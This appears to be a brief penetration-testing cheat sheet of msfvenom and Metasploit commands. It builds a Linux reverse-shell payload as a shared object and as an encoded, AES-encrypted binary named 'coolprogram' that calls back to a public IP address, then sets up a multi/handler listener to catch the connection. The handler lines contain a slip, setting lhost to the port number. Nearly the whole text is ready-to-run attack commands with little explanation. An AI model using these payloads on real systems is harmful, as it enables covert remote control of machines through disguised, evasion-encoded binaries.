msfvenom

// generate Shared Object library

// scrap that
--msfvenom -p linux/x64/shell/reverse_tcp LHOST=xxxx LPORT=4444 -f elf-so -o shell-x64.so

 msfvenom -p linux/x64/shell_reverse_tcp LHOST=31.201.197.47 LPORT=4444 -f elf -e x86/shikata_ga_nai -i 10 --encrypt aes256 -o coolprogram



msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lhost 4444
msf exploit(handler) > run

Last updated

Was this helpful?